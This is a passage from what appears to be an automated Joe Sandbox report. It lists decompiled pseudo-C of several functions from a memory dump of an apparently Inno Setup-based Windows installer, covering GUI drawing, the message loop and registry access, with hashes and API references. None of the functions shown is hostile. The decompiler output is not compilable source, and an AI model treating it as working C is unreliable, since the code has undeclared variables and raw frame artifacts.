Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Menu$Append$System
String ID:
API String ID: 1489644407-0
Opcode ID: 12ee954d9dd57dda4ba813c1b71bbe3f2e612506f98f431c06baef398d025041
Instruction ID: e16edd8279fa0a324c16101bba16bc4487502bc1dd233096facc5133766486c5
Opcode Fuzzy Hash: 12ee954d9dd57dda4ba813c1b71bbe3f2e612506f98f431c06baef398d025041
Instruction Fuzzy Hash: 3631B2307043445AD710EB36AD86BAA3B949F5531CF54847FF844AB3E3CA7C9D09869D

Uniqueness

Uniqueness Score: -1.00%

Function 00451870 Relevance: 4.6, APIs: 3, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00451870(void* __eax, void* __edx) {
				void* _v8;
				char _v9;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				char _v28;
				void* _t21;
				intOrPtr _t29;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t47;
				void* _t50;
				void* _t56;
				void* _t60;
				void* _t62;
				intOrPtr _t63;

				_t60 = _t62;
				_t63 = _t62 + 0xffffffe8;
				_v8 = __edx;
				_t56 = __eax;
				_v9 = 0;
				_push( &_v16);
				_t21 = E00403738(__eax);
				_t50 = _t21;
				_push(_t50); // executed
				L00405B74(); // executed
				_t39 = _t21;
				if(_t39 <= 0) {
					if( *0x4980dc != 1) {
						_v9 = E00451694(_t56, _v8);
					}
					return _v9;
				} else {
					_v20 = E00402648(_t39);
					_push(_t60);
					_push(0x45190b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t63;
					_push(_v20);
					_push(_t39);
					_t29 = _v16;
					_push(_t29);
					_push(_t50); // executed
					L00405B6C(); // executed
					if(_t29 != 0) {
						_push( &_v28);
						_push( &_v24);
						_push(E00451934);
						_t35 = _v20;
						_push(_t35);
						L00405B7C();
						if(_t35 != 0) {
							memcpy(_v8, _v24, 0xd << 2);
							_v9 = 1;
						}
					}
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(E00451928);
					return E00402660(_v20);
				}
			}

0x00451871
0x00451873
0x00451879
0x0045187c
0x0045187e
0x00451885
0x00451888
0x0045188d
0x0045188f
0x00451890
0x00451895
0x00451899
0x00451919
0x00451925
0x00451925
0x00451931
0x0045189b
0x004518a2
0x004518a7
0x004518a8
0x004518ad
0x004518b0
0x004518b6
0x004518b7
0x004518b8
0x004518bb
0x004518bc
0x004518bd
0x004518c4
0x004518c9
0x004518cd
0x004518ce
0x004518d3
0x004518d6
0x004518d7
0x004518de
0x004518ef
0x004518f1
0x004518f1
0x004518de
0x004518f7
0x004518fa
0x004518fd
0x0045190a
0x0045190a

APIs

73EE14E0.VERSION(00000000,?,?,?,00495B9E), ref: 00451890
73EE14C0.VERSION(00000000,?,00000000,?,00000000,0045190B,?,00000000,?,?,?,00495B9E), ref: 004518BD
73EE1500.VERSION(?,00451934,?,?,00000000,?,00000000,?,00000000,0045190B,?,00000000,?,?,?,00495B9E), ref: 004518D7

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: E1500
String ID:
API String ID: 3315179204-0
Opcode ID: 32dc0c669be3dba59a96a2e0946022db037f7dc6cc067028efd4bc0faef57719
Instruction ID: 20ed6491ed2f954116a3f796feedc986cd8e94f36f8aa14e941763638c823977
Opcode Fuzzy Hash: 32dc0c669be3dba59a96a2e0946022db037f7dc6cc067028efd4bc0faef57719
Instruction Fuzzy Hash: 91219275A00248AFDB01DAA98C51EBFB7FCEB49301F55447AF800E3392D6799E04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0044A9C4 Relevance: 4.6, APIs: 3, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0044A9C4(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v12;
				struct HDC__* _v16;
				char _v24;
				char _v32;
				struct HDC__* _t28;
				struct HDC__* _t41;
				void* _t43;
				intOrPtr _t54;
				void* _t58;
				void* _t59;
				intOrPtr _t60;
				intOrPtr _t62;

				_t56 = __esi;
				_t55 = __edi;
				_t58 = _t59;
				_t60 = _t59 + 0xffffffe4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t43 = __eax;
				_push(_t58);
				_push(0x44aac5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60;
				_t45 =  *((intOrPtr*)(__eax + 0x2c));
				E0040AC20(0,  *((intOrPtr*)(__eax + 0x2c)), 0,  &_v32, 0);
				if(_v24 > 0) {
					_t6 =  &_v24;
					 *_t6 = _v24 - 1;
					_t62 =  *_t6;
				}
				_t28 = E00414AD0(_t43,  &_v12, _t62);
				if(_v12 == 0) {
					L6:
					_t28 = E0040357C( &_v12, 0x44aadc);
				} else {
					if( *((char*)(_t43 + 0x106)) != 0) {
						_t28 = _v12;
						if( *_t28 == 0x26) {
							_t28 = _v12;
							if(_t28->i == 0) {
								goto L6;
							}
						}
					}
				}
				_push(0);
				L00405F14();
				_v16 = _t28;
				_push(_t58);
				_push(0x44aa95);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60;
				SelectObject(_v16, E0041A1D0( *((intOrPtr*)(_t43 + 0x44)), _t43, _t45, _t55, _t56));
				E0044A6F8(_v16,  &_v32, _v12, E0044A97C(_t43) | 0x00000400); // executed
				_pop(_t54);
				 *[fs:eax] = _t54;
				_push(E0044AA9C);
				_t41 = _v16;
				_push(_t41);
				_push(0);
				L004060FC();
				return _t41;
			}

0x0044a9c4
0x0044a9c4
0x0044a9c5
0x0044a9c7
0x0044a9ca
0x0044a9cb
0x0044a9cc
0x0044a9cf
0x0044a9d2
0x0044a9d5
0x0044a9d9
0x0044a9da
0x0044a9df
0x0044a9e2
0x0044a9eb
0x0044a9f2
0x0044a9fb
0x0044a9fd
0x0044a9fd
0x0044a9fd
0x0044a9fd
0x0044aa05
0x0044aa0e
0x0044aa2a
0x0044aa32
0x0044aa10
0x0044aa17
0x0044aa19
0x0044aa1f
0x0044aa21
0x0044aa28
0x00000000
0x00000000
0x0044aa28
0x0044aa1f
0x0044aa17
0x0044aa37
0x0044aa39
0x0044aa3e
0x0044aa43
0x0044aa44
0x0044aa49
0x0044aa4c
0x0044aa5c
0x0044aa77
0x0044aa7e
0x0044aa81
0x0044aa84
0x0044aa89
0x0044aa8c
0x0044aa8d
0x0044aa8f
0x0044aa94

APIs

740BAC50.USER32(00000000,?,00000000,00000000,0044AAC5,?,0048075F,?,?), ref: 0044AA39
SelectObject.GDI32(?,00000000), ref: 0044AA5C
740BB380.USER32(00000000,?,0044AA9C,00000000,0044AA95,?,00000000,?,00000000,00000000,0044AAC5,?,0048075F,?,?), ref: 0044AA8F

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: B380ObjectSelect
String ID:
API String ID: 652783318-0
Opcode ID: 94ae97a5c47de24bdc6f41602c12bbd9a6ff14d9c194c102f97edad2c912b674
Instruction ID: e97a7db0b19018eccb7bdd8e2b97057aa5629700143653f2dba4605955584dd2
Opcode Fuzzy Hash: 94ae97a5c47de24bdc6f41602c12bbd9a6ff14d9c194c102f97edad2c912b674
Instruction Fuzzy Hash: 53218670E44248AFEB11DFA5C845B9EBBB8DB48304F5184BAF404F7681D77C9950CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 0044A6F8 Relevance: 4.6, APIs: 3, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0044A6F8(struct HDC__* __eax, struct tagRECT* __ecx, void* __edx, int _a4) {
				struct tagRECT* _v8;
				short* _v12;
				int _t12;
				int _t30;
				intOrPtr _t41;
				struct HDC__* _t43;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff8;
				_v8 = __ecx;
				_t46 = __edx;
				_t43 = __eax;
				_t12 = E00403574(__edx);
				_t30 = _t12;
				if(_t30 == 0) {
					L5:
					return _t12;
				} else {
					if( *0x4980dc != 2) {
						_t12 = DrawTextA(_t43, E00403738(__edx), _t30, _v8, _a4);
						goto L5;
					} else {
						if(_t30 > 0x3fffffff) {
							goto L5;
						} else {
							_v12 = E00402648(_t30 + _t30);
							_push(_t49);
							_push(0x44a784);
							_push( *[fs:edx]);
							 *[fs:edx] = _t52;
							DrawTextW(_t43, _v12, MultiByteToWideChar(0, 0, E00403738(_t46), _t30, _v12, _t30), _v8, _a4); // executed
							_pop(_t41);
							 *[fs:eax] = _t41;
							_push(E0044A7A2);
							return E00402660(_v12);
						}
					}
				}
			}

0x0044a6f9
0x0044a6fb
0x0044a701
0x0044a704
0x0044a706
0x0044a70a
0x0044a70f
0x0044a713
0x0044a7a2
0x0044a7a8
0x0044a719
0x0044a720
0x0044a79d
0x00000000
0x0044a722
0x0044a728
0x00000000
0x0044a72a
0x0044a733
0x0044a738
0x0044a739
0x0044a73e
0x0044a741
0x0044a769
0x0044a770
0x0044a773
0x0044a776
0x0044a783
0x0044a783
0x0044a728
0x0044a720

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A784,?,0048075F,?,?), ref: 0044A756
DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A769
DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A79D

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DrawText$ByteCharMultiWide
String ID:
API String ID: 65125430-0
Opcode ID: 2dcda40591ff521ad6db5f3284d7b2faf7f574eefcdf5e80e57f7bca479d4d22
Instruction ID: bd85c15016dfe3738246438113b79509544e0e6eba2a2d8cf9ec02ddf5800e7c
Opcode Fuzzy Hash: 2dcda40591ff521ad6db5f3284d7b2faf7f574eefcdf5e80e57f7bca479d4d22
Instruction Fuzzy Hash: B611B6B67446047FE710DAAA9C81D6FB7ECEB89724F10417AF504E7290D5389E018669

Uniqueness

Uniqueness Score: -1.00%

Function 004243E4 Relevance: 4.6, APIs: 3, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004243E4(void* __eax) {
				struct tagMSG _v36;
				int _t16;
				int _t32;
				void* _t39;
				char* _t40;

				_t40 =  &(_v36.message);
				_t39 = __eax;
				_t32 = 0;
				_t16 = PeekMessageA( &_v36, 0, 0, 0, 1); // executed
				if(_t16 != 0) {
					_t32 = 1;
					if(_v36.message == 0x12) {
						 *((char*)(_t39 + 0x7c)) = 1;
					} else {
						 *_t40 = 0;
						if( *((short*)(_t39 + 0x96)) != 0) {
							 *((intOrPtr*)(_t39 + 0x94))();
						}
						if(E004243B4(_t39,  &_v36) == 0 &&  *_t40 == 0 && E00424300(_t39,  &_v36) == 0 && E00424350(_t39,  &_v36) == 0 && E004242DC(_t39,  &_v36) == 0) {
							TranslateMessage( &_v36);
							DispatchMessageA( &_v36); // executed
						}
					}
				}
				return _t32;
			}

0x004243e6
0x004243e9
0x004243eb
0x004243fa
0x00424401
0x00424407
0x0042440e
0x00424488
0x00424410
0x00424410
0x0042441c
0x0042442a
0x0042442a
0x0042443d
0x00424477
0x00424481
0x00424481
0x0042443d
0x0042440e
0x00424493

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004243FA
TranslateMessage.USER32(?), ref: 00424477
DispatchMessageA.USER32 ref: 00424481

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: d9ded229c8590facaadff37e87cda2a0a723e8e84bd3d085b18450e606e049c6
Instruction ID: b1c2fd2e30bb76e6d5953017732656b938df3ffbbb3663dbc38eebda5daa6e77
Opcode Fuzzy Hash: d9ded229c8590facaadff37e87cda2a0a723e8e84bd3d085b18450e606e049c6
Instruction Fuzzy Hash: 021194303043105ADA20F6A4BD4179B73D8DFC1754F80481EF98997382D7BD9E49879B

Uniqueness

Uniqueness Score: -1.00%

Function 0041662C Relevance: 4.5, APIs: 3, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041662C(void* __eax) {
				int _t7;
				void* _t19;
				void* _t22;
				intOrPtr _t23;

				_t7 = __eax;
				_t19 = __eax;
				if( *(__eax + 0xc0) == 0) {
					 *((intOrPtr*)( *__eax + 0x64))();
					_t22 = __eax;
					SetPropA( *(__eax + 0xc0),  *0x49a5c8 & 0x0000ffff, __eax);
					_t7 = SetPropA( *(_t19 + 0xc0),  *0x49a5c6 & 0x0000ffff, _t22);
					_t23 =  *((intOrPtr*)(_t19 + 0x20));
					_t25 = _t23;
					if(_t23 != 0) {
						return SetWindowPos( *(_t19 + 0xc0), E004165E4(_t23, _t19, _t25), 0, 0, 0, 0, 0x13);
					}
				}
				return _t7;
			}

0x0041662c
0x0041662e
0x00416637
0x0041663d
0x00416640
0x00416652
0x00416667
0x0041666c
0x0041666f
0x00416671
0x00000000
0x0041668e
0x00416671
0x00416695

APIs

SetPropA.USER32(00000000,00000000), ref: 00416652
SetPropA.USER32(00000000,00000000), ref: 00416667
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 0041668E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Prop$Window
String ID:
API String ID: 3363284559-0
Opcode ID: 0b96c1f9cf6543fecbd6a35da17f5b9789cac81f925d8901db294d131d5f654f
Instruction ID: a7b427a21d9d01d3c7a7c114323539e34fe023f16d3a8bdcb738946a3bd27d2d
Opcode Fuzzy Hash: 0b96c1f9cf6543fecbd6a35da17f5b9789cac81f925d8901db294d131d5f654f
Instruction Fuzzy Hash: 0DF0BD71701220BFEB10AF599C85FA672DCAB09715F16017ABE08EF286C678DD50C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE3C Relevance: 4.5, APIs: 3, Instructions: 27
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041EE3C(void* __edx, struct HWND__* _a4) {
				intOrPtr* _t7;
				struct HWND__* _t9;
				intOrPtr _t11;
				void* _t12;

				_t9 = _a4;
				_t12 = _t9 -  *0x498580; // 0x0
				if(_t12 != 0 && IsWindowVisible(_t9) != 0 && IsWindowEnabled(_t9) != 0) {
					_t7 = E00402648(8);
					_t11 =  *0x49858c; // 0x0
					 *_t7 = _t11;
					 *(_t7 + 4) = _t9;
					 *0x49858c = _t7;
					EnableWindow(_t9, 0); // executed
				}
				return 1;
			}

0x0041ee40
0x0041ee43
0x0041ee49
0x0041ee64
0x0041ee69
0x0041ee6f
0x0041ee71
0x0041ee74
0x0041ee7c
0x0041ee7c
0x0041ee87

APIs

IsWindowVisible.USER32(?), ref: 0041EE4C
IsWindowEnabled.USER32(?), ref: 0041EE56
EnableWindow.USER32(?,00000000), ref: 0041EE7C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$EnableEnabledVisible
String ID:
API String ID: 3234591441-0
Opcode ID: 661549f8b05640278d55d214ebbfaedd3da1a8ea22d29ad18d3c04624f406fe7
Instruction ID: 1fb41f107dd9a6daf7672a0d73ff1e5ecff59270ff5cebb6154dc259c05fed95
Opcode Fuzzy Hash: 661549f8b05640278d55d214ebbfaedd3da1a8ea22d29ad18d3c04624f406fe7
Instruction Fuzzy Hash: 21E0EDB45403046AE750AB2BDCC1E5B779CBB15314F45843BAC059B293DA3DD8468A78

Uniqueness

Uniqueness Score: -1.00%

Function 00480744 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00480744(void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t9;
				intOrPtr _t11;
				void* _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t26;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr _t40;

				_t44 = __fp0;
				_push(_t24);
				_push(_t37);
				_push(_t35);
				_t26 =  *0x49a628; // 0x2262410
				_t6 = E00466728(_t24, _t26, 1, _t35, _t37, __fp0); // executed
				 *0x49b048 = _t6;
				_t42 =  *0x49b3b8;
				if( *0x49b3b8 != 0) {
					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					_v12 = 0;
					_v8 = 0xb;
					_t21 =  *0x49b3b8; // 0x22901cc
					E00492F08(_t21,  &_v12, "InitializeWizard", _t42, __fp0, 0, 0);
					_pop(_t34);
					_t26 = 0x4807a4;
					 *[fs:eax] = _t34;
				}
				_t7 =  *0x49b048; // 0x22877c0
				E00493CF0(_t7);
				_t9 =  *0x49b048; // 0x22877c0
				E00469C44(_t9, _t26, 1, _t42, _t44);
				if( *0x49b36d != 0) {
					_t11 =  *0x49b048; // 0x22877c0, executed
					_t12 = E0046B8C8(_t11); // executed
				} else {
					_t13 =  *0x49b048; // 0x22877c0
					E0046B890(_t13, _t26, _t35, _t44);
					_t15 =  *0x49a628; // 0x2262410
					SetActiveWindow( *(_t15 + 0x20));
					_t18 =  *0x49b048; // 0x22877c0
					_t12 = E00422DEC(_t18);
				}
				return _t12;
			}

0x00480744
0x0048074a
0x0048074b
0x0048074c
0x0048074d
0x0048075a
0x0048075f
0x00480764
0x0048076b
0x00480775
0x00480778
0x00480781
0x00480784
0x00480790
0x00480795
0x0048079c
0x0048079e
0x0048079f
0x0048079f
0x004807bd
0x004807c2
0x004807cc
0x004807d1
0x004807dd
0x00480803
0x00480808
0x004807df
0x004807df
0x004807e4
0x004807e9
0x004807f2
0x004807f7
0x004807fc
0x004807fc
0x00480813

APIs

SetActiveWindow.USER32(?), ref: 004807F2

Strings

InitializeWizard, xrefs: 0048078B

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ActiveWindow
String ID: InitializeWizard
API String ID: 2558294473-2356795471
Opcode ID: e481a3e861eda7b435b62048d2dde5a1acb11249c54305734af75593ac9cc0b8
Instruction ID: a98c25ee96c3713022c78f3a8178700cde703ade30f50db9fd66bd4b04694ffd
Opcode Fuzzy Hash: e481a3e861eda7b435b62048d2dde5a1acb11249c54305734af75593ac9cc0b8
Instruction Fuzzy Hash: 8A1160306143049FD750FB29FD42B1A37E9E715358F10483BE414872A2E7796C88CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0047ABA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0047ABA0(void* __eax, void* __edx, void* __eflags) {
				void* _v8;
				void* __ecx;
				void* _t7;
				long _t13;
				void* _t17;
				void* _t24;

				_t24 = _t17;
				_t7 = E0042DD1C(__eax, "Software\\Microsoft\\Windows\\CurrentVersion", 0x80000002,  &_v8, 1, 0); // executed
				if(_t7 != 0) {
					return E00403400(_t24);
				}
				if(E0042DC4C() == 0) {
					E00403400(_t24);
				}
				_t13 = RegCloseKey(_v8); // executed
				return _t13;
			}

0x0047aba7
0x0047abc1
0x0047abc8
0x00000000
0x0047abee
0x0047abd8
0x0047abdc
0x0047abdc
0x0047abe5
0x00000000

APIs

Part of subcall function 0042DD1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481B1F,?,00000001,?,?,00481B1F,?,00000001,00000000), ref: 0042DD38

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047ADE6,00000000,0047AF20), ref: 0047ABE5

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0047ABB5

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows\CurrentVersion
API String ID: 47109696-1019749484
Opcode ID: 9ac6e1f31baab47cc840eed161da4f1d1b3b77d667a3817b355e56b81b48cd77
Instruction ID: 821e3aeabc459c5987cecf181ed5c98e845f64ee8cd5da46ed9d30c4ebd54980
Opcode Fuzzy Hash: 9ac6e1f31baab47cc840eed161da4f1d1b3b77d667a3817b355e56b81b48cd77
Instruction Fuzzy Hash: FCF0AE3170411467D704A55E5D42B9FA6DDDBC5718F20407BF608DB342D9BDED0243AD

Uniqueness

Uniqueness Score: -1.00%

Function 0046DB54 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0046DB54(void* __eax, char* __edx, intOrPtr _a4) {
				char _v8;
				void* __ecx;
				void* __ebp;
				long _t8;
				void* _t13;
				char _t14;
				void* _t19;
				void* _t20;

				_v8 = _t14;
				_t8 = RegSetValueExA(__eax, __edx, 0, 4,  &_v8, 4); // executed
				if(_t8 != 0) {
					_t4 = _a4 - 8; // 0x0
					_t6 = _a4 - 4; // 0x0
					return E0046D9C8(0, _t13,  *_t4,  *_t6, _t19, _t20, 0, _t8);
				}
				return _t8;
			}

0x0046db58
0x0046db67
0x0046db6e
0x0046db74
0x0046db7a
0x00000000
0x0046db7f
0x0046db86

APIs

RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E1BC,?,?,00000000,0046E352,?,_is1,?), ref: 0046DB67

Strings

NoModify, xrefs: 0046DB65

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Value
String ID: NoModify
API String ID: 3702945584-1699962838
Opcode ID: 620d10342e4346e136ccb12f58c660aa2c1ed7acd9b3b4fbdf8f82c79b92c99b
Instruction ID: e90b3bda476c512b32f7b2d243e68df7f996b7772bf02e53f7434a578a6abb48
Opcode Fuzzy Hash: 620d10342e4346e136ccb12f58c660aa2c1ed7acd9b3b4fbdf8f82c79b92c99b
Instruction Fuzzy Hash: DCE04FB0A40308BFEB04DB55DD4AF6A77ACDB48724F104059BA04DB281E674FE00C668

Uniqueness

Uniqueness Score: -1.00%

Function 0042DD1C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042DD1C(void* __eax, char* __ecx, void* __edx, void** _a4, int _a8, int _a12) {
				long _t7;
				char* _t8;
				void* _t9;
				int _t10;

				_t9 = __edx;
				_t8 = __ecx;
				_t10 = _a8;
				if(__eax == 2) {
					_t10 = _t10 | 0x00000100;
				}
				_t7 = RegOpenKeyExA(_t9, _t8, _a12, _t10, _a4); // executed
				return _t7;
			}

0x0042dd1c
0x0042dd1c
0x0042dd20
0x0042dd25
0x0042dd27
0x0042dd27
0x0042dd38
0x0042dd3f

APIs

RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481B1F,?,00000001,?,?,00481B1F,?,00000001,00000000), ref: 0042DD38

Strings

System\CurrentControlSet\Control\Windows, xrefs: 0042DD36

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
